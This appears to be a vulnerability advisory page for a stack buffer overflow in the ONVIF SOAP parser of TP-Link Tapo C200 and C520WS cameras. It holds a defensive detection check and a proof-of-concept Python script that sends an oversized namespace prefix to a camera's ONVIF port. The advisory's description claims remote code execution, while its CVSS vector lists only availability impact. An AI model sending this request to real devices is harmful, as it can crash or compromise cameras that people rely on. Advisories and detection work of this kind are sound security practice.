Security Vulnerability Report
CVE-2025-8065 CVSS 6.5 MEDIUM

CVE-2025-8065

Published: 2025-12-20 01:16:05
Last Modified: 2026-04-03 17:16:42
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

A stack-based buffer overflow vulnerability was identified in the ONVIF SOAP XML Parser in Tapo C200 v3 and C520WS v2.6. When processing XML tags with namespace prefixes, the parser fails to validate the prefix length before copying it to a fixed-size stack buffer. This allows a crafted SOAP request with an oversized namespace prefix to corrupt memory on the stack. An unauthenticated attacker on the same local network may exploit this flaw to achieve remote code execution with elevated privileges, leading to full compromise of the device.
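As an added example (not part of this report or of the vendor's firmware), a request-inspection check that a gateway or IDS placed in front of the ONVIF service could apply while devices await a fixed firmware: it extracts every namespace prefix declared or used in the SOAP body and flags any longer than a conservative limit. The 64-byte limit, the function names and both sample requests are assumptions constructed for this example.

```python
import re

# Conservative upper bound on a namespace prefix. Real ONVIF prefixes are a few
# characters long; 64 is an assumption for this example, not a vendor value.
MAX_PREFIX_LEN = 64

# Prefix declarations of the form xmlns:PREFIX="..."
_DECL_RE = re.compile(r'xmlns:([^\s=]+)\s*=')
# Prefixed element names in start or end tags: <PREFIX:local ... or </PREFIX:local>
_TAG_RE = re.compile(r'</?([^\s<>/:]+):[^\s<>/]+')


def namespace_prefixes(xml_text: str) -> set:
    """Return every namespace prefix that is declared or used in the document."""
    prefixes = set(_DECL_RE.findall(xml_text))
    prefixes.update(_TAG_RE.findall(xml_text))
    return prefixes


def oversized_prefixes(xml_text: str, limit: int = MAX_PREFIX_LEN) -> list:
    """Return (length, truncated_prefix) for each prefix longer than the limit."""
    return sorted(
        (len(p), p[:16] + "...") for p in namespace_prefixes(xml_text) if len(p) > limit
    )


def should_block(xml_text: str, limit: int = MAX_PREFIX_LEN) -> bool:
    """True when the request carries at least one oversized namespace prefix."""
    return bool(oversized_prefixes(xml_text, limit))


# Constructed sample: an ordinary ONVIF GetDeviceInformation request.
BENIGN = (
    '<?xml version="1.0"?>'
    '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" '
    'xmlns:tds="http://www.onvif.org/ver10/device/wsdl">'
    '<soap:Body><tds:GetDeviceInformation/></soap:Body></soap:Envelope>'
)

# Constructed sample: the same request with a 512-byte prefix in the declaration.
SUSPICIOUS = BENIGN.replace('xmlns:tds=', 'xmlns:' + 'A' * 512 + '=')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        verdict = "block" if should_block(doc) else "allow"
        print(name, verdict, oversized_prefixes(doc))
```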

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.3:build_230228:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.4:build_230424:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.5:build_230717:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.7:build_230920:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.9:build_231019:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:tapo_c200:3:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Tapo C200 v3 (firmware version < latest fixed version)
TP-Link Tapo C520WS v2.6 (firmware version < latest fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# CVE-2025-8065 PoC - Tapo C200/C520WS ONVIF SOAP XML Parser Stack Buffer Overflow
# Target: TP-Link Tapo C200 v3 or C520WS v2.6
# Attack Vector: Adjacent Network (requires same L2 network)
# Authentication: None required

TARGET_IP = "192.168.1.100"
TARGET_PORT = 2020  # ONVIF service port


# Generate malicious SOAP request with oversized namespace prefix
# The prefix exceeds the fixed buffer size in the XML parser
def generate_malicious_soap():
    # Create a namespace prefix that overflows the stack buffer
    # Typical buffer size might be 64-128 bytes, so use 256+ bytes
    overflow_prefix = "A" * 512

    soap_body = f'''<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
               xmlns:{overflow_prefix}="http://www.onvif.org/ver10/device/wsdl">
  <soap:Header>
    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
      <wsse:UsernameToken>
        <wsse:Username>admin</wsse:Username>
        <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">test</wsse:Password>
      </wsse:UsernameToken>
    </wsse:Security>
  </soap:Header>
  <soap:Body>
    <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
  </soap:Body>
</soap:Envelope>'''
    return soap_body


def exploit():
    print(f"[*] Targeting {TARGET_IP}:{TARGET_PORT}")
    print("[*] Generating malicious SOAP request...")
    soap_request = generate_malicious_soap().encode()

    # Send the malicious request
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((TARGET_IP, TARGET_PORT))
        print("[*] Connected to target")

        # Send HTTP POST with SOAP body (Content-Length counts encoded bytes)
        http_request = "POST /onvif/device_service HTTP/1.1\r\n"
        http_request += f"Host: {TARGET_IP}:{TARGET_PORT}\r\n"
        http_request += "Content-Type: application/soap+xml; charset=utf-8\r\n"
        http_request += f"Content-Length: {len(soap_request)}\r\n"
        http_request += "\r\n"
        sock.sendall(http_request.encode() + soap_request)
        print("[*] Malicious request sent")

        # Receive response (a crashed parser typically yields none)
        response = sock.recv(4096)
        print(f"[*] Response received: {response[:200]}")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    exploit()
```

References

Raw JSON Data
